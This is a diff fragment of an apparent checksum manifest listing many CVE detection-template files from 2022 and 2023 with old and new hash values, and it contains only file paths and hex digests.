+http/cves/2022/CVE-2022-31981.yaml:649f6ede266533aa270fab2e0c4bcecb74a6f695 +http/cves/2022/CVE-2022-31982.yaml:381fffd90424876e26d1d92681f39c602ce21c19 +http/cves/2022/CVE-2022-31983.yaml:fc5fe927a405588acc00e160d823c7a89f902380 +http/cves/2022/CVE-2022-31984.yaml:e397499d999e2d7cc5c311f43ed54afd5b1cbb03 +http/cves/2022/CVE-2022-32007.yaml:b566b6790fa6b8dd8994d8b1481362c9b2bb2867 +http/cves/2022/CVE-2022-32015.yaml:572af9b9ecbc65f2285cf9f03484f124548b5ff6 +http/cves/2022/CVE-2022-32018.yaml:156e49b7fbe4141cf1f5d83029af4160644d4c94 +http/cves/2022/CVE-2022-32022.yaml:f2776dcbf3d8b1774cabc6db5015a73a633a5917 +http/cves/2022/CVE-2022-32024.yaml:037328e0515d102ba88e9d383be521dfa9d04977 +http/cves/2022/CVE-2022-32025.yaml:a09625b81eeeb7b034a94241cbf5bfb624e6b072 +http/cves/2022/CVE-2022-32026.yaml:156a5bf812a98cfecf3b88d4219e59337fdcd999 +http/cves/2022/CVE-2022-32028.yaml:cf041e4c7e1af0208e3eb51074df27e4ee11c084 +http/cves/2022/CVE-2022-32094.yaml:ca3b5e4ba26ec6c7b302efd766e1913ebc07573e +http/cves/2022/CVE-2022-32195.yaml:635a920e3c3d0b7b2a98177325229dd1815e50c7 +http/cves/2022/CVE-2022-32409.yaml:7990cc3c1b973f1a461d92a81c212dc8b45be24a +http/cves/2022/CVE-2022-3242.yaml:9c8f45485409ef4d62a2a666988d3bb3570c77d3 +http/cves/2022/CVE-2022-32429.yaml:4c7bcd2fb9552f7b96eb38ef71ce4e9511a33dfa +http/cves/2022/CVE-2022-32444.yaml:8b42d8dffc7826ef2b470f15cbacea50686c52ec +http/cves/2022/CVE-2022-32770.yaml:66c72897816a49858604be2ed20c4f149c22f953 +http/cves/2022/CVE-2022-32771.yaml:c552d15a2f835e3464c1b5a4d78450096092347c +http/cves/2022/CVE-2022-32772.yaml:765dce1fe353b3abe4adf99f3be77cabc66e18e5 +http/cves/2022/CVE-2022-33119.yaml:ee8ac040fec3c67037c91906c39675849d6e79af +http/cves/2022/CVE-2022-33174.yaml:5fecebe61c423e1c2e418300780d142c5006e44f +http/cves/2022/CVE-2022-33891.yaml:6ae64dbdafd2dff1ea0d2aa5e5e50b3b8733d595 +http/cves/2022/CVE-2022-33901.yaml:a21f368392c3bce4aab67ce863b00686e3c72667 +http/cves/2022/CVE-2022-33965.yaml:821af1aaa7840d3f0f7e92f645e6e63406bdb80d +http/cves/2022/CVE-2022-34045.yaml:5dbb08f0e6bd0e150311e65c66ce5bf9338a2ce1 +http/cves/2022/CVE-2022-34046.yaml:31ba2fead54948fab790d6e3dc6eb4a602fcb924 +http/cves/2022/CVE-2022-34047.yaml:66de4ffaed5818bd6351031b4d4dd2c0144b8dca +http/cves/2022/CVE-2022-34048.yaml:9a17427278699e7ecd62a84cab784617d94e8d55 +http/cves/2022/CVE-2022-34049.yaml:3ab52102326b45a1650a1fa67a7619ca217800aa +http/cves/2022/CVE-2022-34093.yaml:6067a0363cc42728c00abdd666bccc50803b7d22 +http/cves/2022/CVE-2022-34094.yaml:3a5df8d8b98cf0c5871531ad5b74bebe1939d166 +http/cves/2022/CVE-2022-34121.yaml:42b5e99fd46b30e7a90d7db73f506fcea3c7f5df +http/cves/2022/CVE-2022-34328.yaml:04a13830bbcdfb298c9b54a2ea0b503c3a7bcd41 +http/cves/2022/CVE-2022-34576.yaml:a975e17f1f72107e44c08f6ff4ab9ae4c8c7a14b +http/cves/2022/CVE-2022-34590.yaml:a4eb7b2bfe35b5278535752009d8e2a71bec1179 http/cves/2022/CVE-2022-34753.yaml:c0cb0f0e50be8de704909d92178a2aace508cd79 -http/cves/2022/CVE-2022-3484.yaml:11b300d91c1c00b8afc21757071a56fe270535b0 -http/cves/2022/CVE-2022-3506.yaml:65ecd8fc7289dc615f190a05c6d4c413e6e2b32a -http/cves/2022/CVE-2022-35151.yaml:b04fc815d0466dd11e9e7a833368cbab382f8db7 +http/cves/2022/CVE-2022-3484.yaml:6113b3e57fd048edb70df35e66687cde3cea325b +http/cves/2022/CVE-2022-3506.yaml:dd0fed15be2634abd1861eb7b187c12b5535bf6c +http/cves/2022/CVE-2022-35151.yaml:1397bb61a34302b2745db1c071bc0912db551b00 http/cves/2022/CVE-2022-35405.yaml:46daa670cc07da29e1360df9b6842c5443ee1bbf http/cves/2022/CVE-2022-35413.yaml:3e09fdddddc16d8c79f10d3e7a40407218951386 -http/cves/2022/CVE-2022-35416.yaml:1bf84245563103b8ae3e85ea81415bd2f250c710 -http/cves/2022/CVE-2022-35493.yaml:6a002981ed36f97dd9580e17cef90af958157f6c -http/cves/2022/CVE-2022-3578.yaml:0b0de8e3febe436e76a04e1d920248ad20144536 +http/cves/2022/CVE-2022-35416.yaml:d3a09811edb602eb38ef66b14075de3698ba3c6d +http/cves/2022/CVE-2022-35493.yaml:8e6367f3e5ac0640ae4ec34112bdc51b4a18743a +http/cves/2022/CVE-2022-3578.yaml:2f5fd9a4840f77f8afe87d194ab36914dd3ccb72 http/cves/2022/CVE-2022-35914.yaml:87a26110fe6fbeddd8d0f38e04be854715309ade -http/cves/2022/CVE-2022-36446.yaml:3a5fa8d4a9915b7f33b5a4297e03b75d4b0c7345 +http/cves/2022/CVE-2022-36446.yaml:b969f19d5b7fe0343959ffe86e6f9870efb0d838 http/cves/2022/CVE-2022-36537.yaml:2d778d5222e315c22834bca02d6289b973646f9d -http/cves/2022/CVE-2022-36553.yaml:e0f544c8b07ea3da2e7f2ed4ef4e47df1f949017 -http/cves/2022/CVE-2022-36642.yaml:a3bb2a61ceffacae80ab5e82ea6adf02bcb20d62 -http/cves/2022/CVE-2022-36804.yaml:ec7d0721bcbc7cacfff4b4c2553d330df2cb1f49 -http/cves/2022/CVE-2022-36883.yaml:928f1d7c18b4b0d5aa63aeb9c4ca2b469afe078e +http/cves/2022/CVE-2022-36553.yaml:39caf26575d58c4369f5c1d8dc9df24cfa4f2660 +http/cves/2022/CVE-2022-36642.yaml:a091aafd0bb0c7f6cca195ee8e889407b4b6b32c +http/cves/2022/CVE-2022-36804.yaml:fd97f746fc7c3a3d6b9f10b3dd392556f9e84674 +http/cves/2022/CVE-2022-36883.yaml:fc185d8f184eb6dd35b09d51d0336de0aa3abe1d http/cves/2022/CVE-2022-37042.yaml:94a30ee59489d7eae340c71ac4c6df2c7e4a2cb5 -http/cves/2022/CVE-2022-37153.yaml:cc8ed46a0dbfc773cb7ba65490bf42f684f69b38 -http/cves/2022/CVE-2022-37190.yaml:e72236ed6d3a44a1df5f8ba8495f3ecceddd32f0 -http/cves/2022/CVE-2022-37191.yaml:66fc3002f7af9112f0ec73ea35eecf4df87cc9ca -http/cves/2022/CVE-2022-37299.yaml:1dac1404dce7a7dc2229ce4ad2ddd8827c8bfc74 -http/cves/2022/CVE-2022-3768.yaml:874a8408d47aede57122293a6ce9279bab784085 -http/cves/2022/CVE-2022-3800.yaml:898968b56f9a2f44379edbe6dd2eb1c09d888c77 -http/cves/2022/CVE-2022-38295.yaml:df308c3edd3259658fe79acb4a3c830696477900 -http/cves/2022/CVE-2022-38296.yaml:85f869f849fe33eb34cde383dc7863e9c1841767 -http/cves/2022/CVE-2022-38463.yaml:2bbd400722675c8010abda0fdea0d860c6eb6740 -http/cves/2022/CVE-2022-38467.yaml:be3d0fc16a8a7524d38c5c6a5cf045b6cf174020 -http/cves/2022/CVE-2022-38553.yaml:59c085a42925d962ea871f11be36a4503712db3b -http/cves/2022/CVE-2022-38637.yaml:bd9d0dedd3ad8cfc32db70789af8c9720b7ebb81 -http/cves/2022/CVE-2022-38794.yaml:14851db5d7559dc70f6a8e3417262447834b7455 -http/cves/2022/CVE-2022-38817.yaml:21195e91f7ecf5342d0ff1c1b0a60a66b2d7eeb5 -http/cves/2022/CVE-2022-38870.yaml:23a1781fd299650d44cbecaf1c3e9d83e7533c0e -http/cves/2022/CVE-2022-39048.yaml:90f8ec8b79e65c45a4be3347bb03bfce027ca36d -http/cves/2022/CVE-2022-3908.yaml:0c8a8fb0b9ce0d50ff142c8c12e2c765bd74896e -http/cves/2022/CVE-2022-39195.yaml:2bb63ab63a18719798513f4e34634cf064f2622d -http/cves/2022/CVE-2022-3933.yaml:c7cdd033e68a61ae9955a51f253f86b6e5e454cb -http/cves/2022/CVE-2022-3934.yaml:73847456866fdbfb3c7ba78afc896f21899362c4 +http/cves/2022/CVE-2022-37153.yaml:2489c8a33968304ba17b8814c6de7a531377fdca +http/cves/2022/CVE-2022-37190.yaml:816f9fe69188ba5d13233d51f64a17548127a4a1 +http/cves/2022/CVE-2022-37191.yaml:f56b4ac03a2ca543ebcd560b20611437452ab825 +http/cves/2022/CVE-2022-37299.yaml:ef6073e0458c193d7565e5dc9d9791d96fd2e867 +http/cves/2022/CVE-2022-3768.yaml:ca2c556c8b54ce3be3771c643cdb3ccb78b44a78 +http/cves/2022/CVE-2022-3800.yaml:80009e83dfd8d9807b86d36a8c65292c3c96c425 +http/cves/2022/CVE-2022-38295.yaml:743fb31098ea9c4f6665c0b8ba9544df2102b06a +http/cves/2022/CVE-2022-38296.yaml:5f7d9ae0640d52794df443f24965df97ad784529 +http/cves/2022/CVE-2022-38463.yaml:7e8cebc37ae079bdd7fe820b766bcdf390dc491c +http/cves/2022/CVE-2022-38467.yaml:755acf85bd085faebe8a35d9501558303bd17b2e +http/cves/2022/CVE-2022-38553.yaml:6086f092ce4d7a7f45fdd347e4dd0f02687a7ed9 +http/cves/2022/CVE-2022-38637.yaml:fc280294ad9a9dc94513b6640a4f76e0a79513bb +http/cves/2022/CVE-2022-38794.yaml:c58aef95ddaa0c72fae222cff8b3a88419549ba4 +http/cves/2022/CVE-2022-38817.yaml:0a869580f5d405ba081510c28d75128dec777e45 +http/cves/2022/CVE-2022-38870.yaml:11a12d70c7f68765f497a5287d973f31d2a633d0 +http/cves/2022/CVE-2022-39048.yaml:f4d7eec6395f0832a110a3953321df880933c8fe +http/cves/2022/CVE-2022-3908.yaml:daa7043fd1c1f40f44d64142e473d5f950c5704e +http/cves/2022/CVE-2022-39195.yaml:6c4ce1bfbce11673190ea12facf78adafa0e84ed +http/cves/2022/CVE-2022-3933.yaml:0ea19aed204602b67ffd1a24e0a4d7d3e211ade4 +http/cves/2022/CVE-2022-3934.yaml:8567fb91d70c953aab88b4d804ed78c8eb7b77ea http/cves/2022/CVE-2022-3980.yaml:3b99b480a97a6f372294c59fe4e69e3e6909434f -http/cves/2022/CVE-2022-3982.yaml:fbf7b0eb5e54f57b542a9ef7e5d1f263a02e1775 -http/cves/2022/CVE-2022-39952.yaml:c9d54002d4a5f4f97d7aaa98d3343e8c3322ca91 +http/cves/2022/CVE-2022-3982.yaml:6f880d2f4d69ad5d7511bf6e3bb4cf33b9aa67dc +http/cves/2022/CVE-2022-39952.yaml:a2400f80c93c0a161cd85ae155f7f828bbd27cfe http/cves/2022/CVE-2022-39960.yaml:baa90990db3a35dcd782762be6cc0e986a598c10 http/cves/2022/CVE-2022-39986.yaml:6cbcb3cb70d87b644c9142f821a6c763d61b4eb8 http/cves/2022/CVE-2022-40022.yaml:02711686f12d66dacd9b6d21ba7e82b9a0ae1716 -http/cves/2022/CVE-2022-40032.yaml:e386516f24c060db1da2a57d940a35759160cb18 -http/cves/2022/CVE-2022-40047.yaml:3289ab5e8fee37a887332701e1de5eb2b2823cd6 -http/cves/2022/CVE-2022-40083.yaml:9d902ce3b06241dd514af7d8c7a3918fa55ecb56 -http/cves/2022/CVE-2022-40127.yaml:070439c34f4153d232dc256624fdc359e44e5097 -http/cves/2022/CVE-2022-40359.yaml:601afe25cfcd985b7bd5a5823f29aede111cff94 -http/cves/2022/CVE-2022-4049.yaml:aa48a9a2052fad068e3916e6ec4878014303b1b0 -http/cves/2022/CVE-2022-4050.yaml:70c5ba5c20d5fbdec36a33989156587e0e1f5a14 -http/cves/2022/CVE-2022-4057.yaml:90dedb181a7af802e8dc0848557052a6c7791d4e -http/cves/2022/CVE-2022-4059.yaml:cd0e7cd747e1b817721fa0c3dbf8e8228e5d5a78 -http/cves/2022/CVE-2022-4060.yaml:af7f0cea3bb7d04946012e3e988923b742b0d367 -http/cves/2022/CVE-2022-4063.yaml:ac475409a08829a9e8a97f646552389af5d4f86d +http/cves/2022/CVE-2022-40032.yaml:8db2826a6cc748f90f5302ad14f5bea333f8b3bb +http/cves/2022/CVE-2022-40047.yaml:7f8be29b063730c284f5ce90b43d3addc634fda4 +http/cves/2022/CVE-2022-40083.yaml:f384a95622c55468a6c3bb3ab6f81ba3c4df442e +http/cves/2022/CVE-2022-40127.yaml:8abc6a82e5e6061a5376c0f963812bcbb0f94aa5 +http/cves/2022/CVE-2022-40359.yaml:9c09561b0a3c67d6855b088b254d002f92e68d02 +http/cves/2022/CVE-2022-4049.yaml:dbc6790ab6eb39fc174d493568f9f79333b5e880 +http/cves/2022/CVE-2022-4050.yaml:afdc412b40679a68d0111565312e278919a7775c +http/cves/2022/CVE-2022-4057.yaml:501f3987719664f0a342e4b37087626e27714d99 +http/cves/2022/CVE-2022-4059.yaml:0c897ef7b981179105d276b6b9e954c8483b51b5 +http/cves/2022/CVE-2022-4060.yaml:259592924e9919c622095069672853ad686e7888 +http/cves/2022/CVE-2022-4063.yaml:19bcb677a7ab27aa71bfc80940beb959cfeb638f http/cves/2022/CVE-2022-40684.yaml:e3a6b3256e2cf3b21ebb6c61692d44c8a9e7a57a -http/cves/2022/CVE-2022-40734.yaml:e901d9ad30838dbeab4572f1596fb8960bd541b3 +http/cves/2022/CVE-2022-40734.yaml:638502e52a3b3a93c84fb750e695e7e8d96ab05d http/cves/2022/CVE-2022-40843.yaml:5c44929765865d31e29010a55b849e740dec4b53 -http/cves/2022/CVE-2022-40879.yaml:1f8cf9ced6e348dc7c94499a91a0a1dd1a518494 -http/cves/2022/CVE-2022-40881.yaml:ff7ae865491c86a3f326c7f734a6723c3afd16d9 -http/cves/2022/CVE-2022-4117.yaml:dcb05e399e0a4e2bada3d9b118d4c838897115f8 -http/cves/2022/CVE-2022-4140.yaml:44ffd329d561a9c7bc19ccc61178b7a21460e6d8 -http/cves/2022/CVE-2022-41441.yaml:2cd7eb660dae3979514a61e153d57f23a2fc94ee -http/cves/2022/CVE-2022-41473.yaml:f60bbddedf15f637f5ea3aff982443691ed765cc -http/cves/2022/CVE-2022-41840.yaml:b60b50d4e70af61810ef3e53004f546bf18e2845 -http/cves/2022/CVE-2022-42094.yaml:eba1888e99b0273854aba0c5dba249a874e08304 -http/cves/2022/CVE-2022-42095.yaml:dbe5ba607ae40a8e1dc0440e2f21cc22004813d3 -http/cves/2022/CVE-2022-42096.yaml:86952e2d020f1e6326293953c70a7eb46f11019a -http/cves/2022/CVE-2022-42233.yaml:a07fd13e050d38b544f55e3b0f60093cf00f469a -http/cves/2022/CVE-2022-4260.yaml:087153ba27700e7d4360e113bf53473b21a4f206 -http/cves/2022/CVE-2022-42746.yaml:eb2925adbb8ba0229ace759f7bd4fe34d22313ef -http/cves/2022/CVE-2022-42747.yaml:ad261a60e6ec2e132e3d565f491c828a23e6d04f -http/cves/2022/CVE-2022-42748.yaml:5a229d719ab0ccdb1df45f524b577e82d7794cd1 -http/cves/2022/CVE-2022-42749.yaml:692dc0b53c8dcffdb61318e02a4e0bc2aa49b29f -http/cves/2022/CVE-2022-4295.yaml:4992934064d3362d9d8876d1b863501b933b1cb1 -http/cves/2022/CVE-2022-4301.yaml:3c4a38fc3172b6e099690fd1c55235508ce51b8a -http/cves/2022/CVE-2022-43014.yaml:7fe3cfe2561bf30d90c0421d3bb47e10fbdaa0ca -http/cves/2022/CVE-2022-43015.yaml:5e594163691ca3a97d4cd4ff067294fc8113036e -http/cves/2022/CVE-2022-43016.yaml:6c9aa0cc6b509fdc26eb333c83c6bd8dcbf98350 -http/cves/2022/CVE-2022-43017.yaml:c8f684c1154a2cce2a61cd06fb7753ab0149252d -http/cves/2022/CVE-2022-43018.yaml:2be8679649d47e726d073885654fb30897cda29f +http/cves/2022/CVE-2022-40879.yaml:a6ac5235c6b315c1c951beeae1a4ad3fa1df7e75 +http/cves/2022/CVE-2022-40881.yaml:82ecdf74b98bba2a11e1270178235e650a8aab47 +http/cves/2022/CVE-2022-4117.yaml:600e7ea91fafb129a3e2dca248f4ae964e44cf47 +http/cves/2022/CVE-2022-4140.yaml:2153d2146b31800c53f8f08527b241cf5f34786c +http/cves/2022/CVE-2022-41441.yaml:8db9534f98519282e43007354e362b00e921a0fe +http/cves/2022/CVE-2022-41473.yaml:c22cef6d5a51c0a334991e3533b53fb3fcd923df +http/cves/2022/CVE-2022-41840.yaml:9c255e60d5eacfc59d0045cef78e94ab65d3e83e +http/cves/2022/CVE-2022-42094.yaml:5112ba30c95f7ee21b4391744bed7fd7d485beb1 +http/cves/2022/CVE-2022-42095.yaml:a03bd320033c4bddf13bddaeb061c0b9374c4e0e +http/cves/2022/CVE-2022-42096.yaml:2dca1fbd0682f453ddc4a5311b295e72c34fe724 +http/cves/2022/CVE-2022-42233.yaml:e3b71ff7abc71909bb9761b27aa219c572f54b2d +http/cves/2022/CVE-2022-4260.yaml:07ec348652be19d6dd3a9aa79557b67518c189bd +http/cves/2022/CVE-2022-42746.yaml:4c581bdc029ca0fbd18eb7c9ee30355c68be6ca0 +http/cves/2022/CVE-2022-42747.yaml:8854e83ecd59e3673f0b8d0b868e3d5e91fe1389 +http/cves/2022/CVE-2022-42748.yaml:867df38ff889a0e603e937ab5000f53c2d55beb4 +http/cves/2022/CVE-2022-42749.yaml:94f6cf5936e73f6e51e63964813b92b3b72d2992 +http/cves/2022/CVE-2022-4295.yaml:5eeb4c36bc5a30237b0f71eba82764d5371b55ca +http/cves/2022/CVE-2022-4301.yaml:0004de7748da4f082269a9ec8fef6d6e829e26f9 +http/cves/2022/CVE-2022-43014.yaml:a2506065e086c4592318f9f04e73e1eb662d6895 +http/cves/2022/CVE-2022-43015.yaml:788bf6ba870344630717f39767534824a3a573fc +http/cves/2022/CVE-2022-43016.yaml:aa2cbc482236893d755a65668da8ca550c95a823 +http/cves/2022/CVE-2022-43017.yaml:52dc344d0090f42292804ba11a0ff5dd22317a02 +http/cves/2022/CVE-2022-43018.yaml:eb364708ad1c312d3ada80af1dbad0860ea65c10 http/cves/2022/CVE-2022-4305.yaml:6325294b946c5bc93a77170cc3a9089eafb01bd0 -http/cves/2022/CVE-2022-4306.yaml:632eca3bb6fa930996a5793a1128141fbb8aad74 -http/cves/2022/CVE-2022-43140.yaml:530b1c00ba3ea09146f85681f856a1e8c69caa8d -http/cves/2022/CVE-2022-43164.yaml:b726f5d635cc9da3701abdd2cf9e795d39f45bc8 -http/cves/2022/CVE-2022-43165.yaml:a70ad03474299af520eed30c1228ab330a160a71 -http/cves/2022/CVE-2022-43166.yaml:e7b2aacf6b7cca4cfc92ce2718b80b06cdeb1278 -http/cves/2022/CVE-2022-43167.yaml:efbf3df1e4277f3f8149adea5131df2d6d56dd7d -http/cves/2022/CVE-2022-43169.yaml:4942cc931b9d386c6b25ded1832aa9468f663ccb +http/cves/2022/CVE-2022-4306.yaml:4833f71faa3a76d627de4d2f2bbdff3e304993c8 +http/cves/2022/CVE-2022-43140.yaml:c278ef0c253c32b000d14205ea64c1c2abb66a70 +http/cves/2022/CVE-2022-43164.yaml:038612cf9c4491bdf057e0d897d1928ccb774844 +http/cves/2022/CVE-2022-43165.yaml:ccc77a0ce9d5d12a63cf66b133061022988781b6 +http/cves/2022/CVE-2022-43166.yaml:653228f1cf8e6bf93b13ca19626f54953e9713c6 +http/cves/2022/CVE-2022-43167.yaml:1a3692be2f0829a13b21afa731627f8b714787e0 +http/cves/2022/CVE-2022-43169.yaml:617182520b0ed202c1b15858505fc9d118c20501 http/cves/2022/CVE-2022-43170.yaml:522c6544c521220dddad7b4c6de0a3c89b7a1956 http/cves/2022/CVE-2022-43185.yaml:d97c4aafed603f60cc906faab5a661d283f0da4f -http/cves/2022/CVE-2022-4320.yaml:57a3cad3bf1d7d41cf07623847e71f2cfee75671 -http/cves/2022/CVE-2022-4321.yaml:09b362dd916431500a7273deb504a03d0ce5727c -http/cves/2022/CVE-2022-4325.yaml:e23ce43b443c021ab0a2b8a112ab0d69f7a91e80 -http/cves/2022/CVE-2022-4328.yaml:c07ba35a885bbdb8448c3e08dc1bf9c30aa2f0c2 +http/cves/2022/CVE-2022-4320.yaml:4de4fac333505c4394e99a98895ce9903c554ea4 +http/cves/2022/CVE-2022-4321.yaml:631d3569a603097207e2a83c557606c6d189c4be +http/cves/2022/CVE-2022-4325.yaml:daad33dad45c363d4cb1dc34d8f4fddaf6a2e9bb +http/cves/2022/CVE-2022-4328.yaml:16ad5840414271fbf42e1b73dec6538aba549817 http/cves/2022/CVE-2022-43769.yaml:e8a0d05f9a2f0981d1ed5d9861144e7743370d4f -http/cves/2022/CVE-2022-44290.yaml:a917fa3cd85ea7930d7fd46c450ba28b0c3903d9 -http/cves/2022/CVE-2022-44291.yaml:bb2c0d81e48aef60d9c65aa78e9df1f91cdc10b6 -http/cves/2022/CVE-2022-4447.yaml:d703542836a4803baf7017ae3b5ad5cd9ed8615b +http/cves/2022/CVE-2022-44290.yaml:7dcc24e27d43ff53f6d29ff04b28250dcc503109 +http/cves/2022/CVE-2022-44291.yaml:87078129cd2b2cfaa3e149da6bcd5724c6a14cb0 +http/cves/2022/CVE-2022-4447.yaml:d2da2de0b1c23eb70218156434649d2b2ac0c163 http/cves/2022/CVE-2022-44877.yaml:bf708793e928e2fb194a3b3a89b92c965eb7e8c1 -http/cves/2022/CVE-2022-44944.yaml:37cd43491973f5d041216733e6934f42c0883093 -http/cves/2022/CVE-2022-44946.yaml:806c8bbf9e6e8dc80c46c181eea7e2f345162c55 -http/cves/2022/CVE-2022-44947.yaml:a0494832811f94d482c0500154a3388beff8e528 -http/cves/2022/CVE-2022-44948.yaml:bc06797ae1e574e91d5876effd1b5c542fd5bcb2 -http/cves/2022/CVE-2022-44949.yaml:49c15f32f14067dbd11190f7768e27c7a38fec3f -http/cves/2022/CVE-2022-44950.yaml:06b146c0f96ab29dcac100e628cfced8f97cfa2f -http/cves/2022/CVE-2022-44951.yaml:226b94630a1636a3ba82eef81563bef71b59bb38 -http/cves/2022/CVE-2022-44952.yaml:44a5643f3e43a327ed4819dcead6293e8686ffcb -http/cves/2022/CVE-2022-44957.yaml:3ecae84c0319e159cb207c3dc0745381ec258179 -http/cves/2022/CVE-2022-45037.yaml:b16d860f9a0417be339a872678acd3447243f54d -http/cves/2022/CVE-2022-45038.yaml:bbbd4dec0e2c21e320780589eba138f52ca80402 +http/cves/2022/CVE-2022-44944.yaml:f0336f05b9f6f67d40b1c1dabf089b009527d151 +http/cves/2022/CVE-2022-44946.yaml:56cdf20d0ff853118b61a30cf7c840e17fb53445 +http/cves/2022/CVE-2022-44947.yaml:76d083a9654a41b8d284612ae4cf8b04f2cba7d6 +http/cves/2022/CVE-2022-44948.yaml:8548e0718804c6e4268d6000297451fa0f400c36 +http/cves/2022/CVE-2022-44949.yaml:f68c8c3e3fe0df51c893b578c181aa02f4ba72c4 +http/cves/2022/CVE-2022-44950.yaml:307c0d3d84c80e286df68dad7c144d8bdfa7728d +http/cves/2022/CVE-2022-44951.yaml:23e939b448abe4be58f250d5272ecf649a3f0323 +http/cves/2022/CVE-2022-44952.yaml:b729e01c18ee02ade5640af5028370f19c62600b +http/cves/2022/CVE-2022-44957.yaml:d720f27bc9bfb30a1f593e028b2e719ce231f1c4 +http/cves/2022/CVE-2022-45037.yaml:7a5632c6e0eb6a0903edc67156d565b6b7ffd137 +http/cves/2022/CVE-2022-45038.yaml:da11fa924c791ad3e6f1c5092def5367670eee56 http/cves/2022/CVE-2022-45354.yaml:74b3e516dafb8498fc37736a5c504dec4325bca5 http/cves/2022/CVE-2022-45362.yaml:8b38771a9d554ed3e0813063295cc0113aaf3beb http/cves/2022/CVE-2022-45365.yaml:bc6d4127eb5583316f2ee30607f2c57f6a348daa http/cves/2022/CVE-2022-45805.yaml:e48872860059c99910e7872cf33e46beffa1140a http/cves/2022/CVE-2022-45835.yaml:9b8d0fe74bf30733642921c3778b4a3e315c5872 -http/cves/2022/CVE-2022-45917.yaml:088e521b9f6dbe4bcf88b4a8f033d6d7c5b7e621 -http/cves/2022/CVE-2022-45933.yaml:822b19ab851c490d918a4a4090e39b030c0b7a1a -http/cves/2022/CVE-2022-46020.yaml:d9b6f9c46b78d64f3a110faecc3284ecbe744ed6 -http/cves/2022/CVE-2022-46071.yaml:feabdd1d8106f8600c2ea9ab63a4441bd8e752ae -http/cves/2022/CVE-2022-46073.yaml:41f1a20cc54a683afae73fc389a0d3635af41d89 +http/cves/2022/CVE-2022-45917.yaml:75cd15da05561711ed03debb9ffe55f18ab0a328 +http/cves/2022/CVE-2022-45933.yaml:5ded5ec37a88aaf1761f5fd02d047e80649152e5 +http/cves/2022/CVE-2022-46020.yaml:41f3e23fb854dc48152c041288fd7c5f703fa570 +http/cves/2022/CVE-2022-46071.yaml:f3505cc0df6af667395dd2e9803ad35ef4748ead +http/cves/2022/CVE-2022-46073.yaml:9d83c9084618ddfca8674837d5a8c43ec6d2f0f0 http/cves/2022/CVE-2022-46169.yaml:58024d806c9baef15a75f9d7df8721639a892c79 -http/cves/2022/CVE-2022-46381.yaml:eda3214f468e8a8dfb844b8d45564f72497b2670 -http/cves/2022/CVE-2022-46443.yaml:8c9d4083122b4d338d88d27f77920df56cf154d6 -http/cves/2022/CVE-2022-46463.yaml:8e54090c528cea781ee6ee53855dd3b28861c69f -http/cves/2022/CVE-2022-46888.yaml:3c31a15888df561974226e55b6aca4de1b3be0f7 -http/cves/2022/CVE-2022-46934.yaml:aced5400a7160125937fd2525e9f0d4dcdf5c0b3 -http/cves/2022/CVE-2022-47002.yaml:d960d21f0075b484206a287eef6351586cdbdafd -http/cves/2022/CVE-2022-47003.yaml:4e99ddcb5b2fdc404fd8285199074d5e601e45fe -http/cves/2022/CVE-2022-47075.yaml:f0b45830008a65a2bd65c280d1e6baafba119bf4 -http/cves/2022/CVE-2022-47615.yaml:87e308570dfc4c70ec30253e8145c8a30857d921 -http/cves/2022/CVE-2022-47945.yaml:bdec5f9182d2dcf7e7a9a36589bca3f3b1a5ef82 +http/cves/2022/CVE-2022-46381.yaml:5c4f8e4a00da1e9f4089ae1bc5e9358f6f766679 +http/cves/2022/CVE-2022-46443.yaml:ddffebdcc164ff7fe50023481a3abe38f68d7a3f +http/cves/2022/CVE-2022-46463.yaml:1d5841b7986b68b70d8f45f7afbd69782eb4df2e +http/cves/2022/CVE-2022-46888.yaml:303df78d604006afae33818ac7e9955ad8191b43 +http/cves/2022/CVE-2022-46934.yaml:7f8886b1a8a4a0886f1d462224fff73ff156d6b6 +http/cves/2022/CVE-2022-47002.yaml:9eab05e971b432a8a4c6836ed7e945bf1e25f4ec +http/cves/2022/CVE-2022-47003.yaml:4e2856554b4714094f775f0d6e20b2f3280596a2 +http/cves/2022/CVE-2022-47075.yaml:ff3d5412a7e9a151d1d446a7222a0dc77135c381 +http/cves/2022/CVE-2022-47615.yaml:2289a689f20e754d378dbfffe98843920256f273 +http/cves/2022/CVE-2022-47945.yaml:84261cf28b83c6284c12b004ba3a35212a844728 http/cves/2022/CVE-2022-47966.yaml:33f313cf309f54f97a219a8dc0a072ee77dec169 -http/cves/2022/CVE-2022-47986.yaml:1a4e3360860d016ca59c9a857d083fa66b55381f -http/cves/2022/CVE-2022-48012.yaml:3cd40d26061d8025d799eafe834bad6c2690108f -http/cves/2022/CVE-2022-48165.yaml:5c6ae24ff1d3b89081e3dc842a4b7836ac4ef3d8 -http/cves/2022/CVE-2022-48197.yaml:cc2399bda29e0d31b0d689c0ff0bca440e4c8881 -http/cves/2022/CVE-2022-4897.yaml:b2c23eccc62b2ffb50e1acabe13a22633ccc4760 -http/cves/2023/CVE-2023-0099.yaml:b4f4de22e8d42a9fdcab5ea792acd96debd1d7d2 -http/cves/2023/CVE-2023-0126.yaml:91e4e66447808c05661250dd362e5eea1852c708 -http/cves/2023/CVE-2023-0236.yaml:f100997f5556172ff6465c17c4cfede4c31f5213 -http/cves/2023/CVE-2023-0261.yaml:bf2277a539168fbff5877b99353afa64e193d401 +http/cves/2022/CVE-2022-47986.yaml:8eae1a63d25995ca302c17d7c56faa1c3a60d407 +http/cves/2022/CVE-2022-48012.yaml:87d3751fa004c70293a4b0a370e41abcb939536a +http/cves/2022/CVE-2022-48165.yaml:8c3f1d3bc91772ca91e52b05ea51c0fcef5abb4e +http/cves/2022/CVE-2022-48197.yaml:c3eb8a6243b069e7ea07e5f234ab74be1a07c420 +http/cves/2022/CVE-2022-4897.yaml:1e2196e1fe697bf05f6415ed32dd4597d1fbb191 +http/cves/2023/CVE-2023-0099.yaml:12f03f85fee6cd4882b79df42b83b1a78211d350 +http/cves/2023/CVE-2023-0126.yaml:996f9e6613947eb1f4b26ec3ce6e372331eb708e +http/cves/2023/CVE-2023-0236.yaml:24558254377e6abc124c00531a35558bb822a0b6 +http/cves/2023/CVE-2023-0261.yaml:80eab7358d326764cac0fb51a24bd6f9256055f6 http/cves/2023/CVE-2023-0297.yaml:e0637bd4e7f4469a229797a97821a23586c2d0e0 -http/cves/2023/CVE-2023-0334.yaml:6e6b09e6aa228078241d0b45b3c554486f80f879 -http/cves/2023/CVE-2023-0448.yaml:5b65566115661eed2feebc1a9ec72747499ed661 -http/cves/2023/CVE-2023-0514.yaml:30bee677cf0622bd2c3807a82233760bc31846b6 -http/cves/2023/CVE-2023-0527.yaml:a923e5ed912c8d7035821d71b0fdd08429f9d367 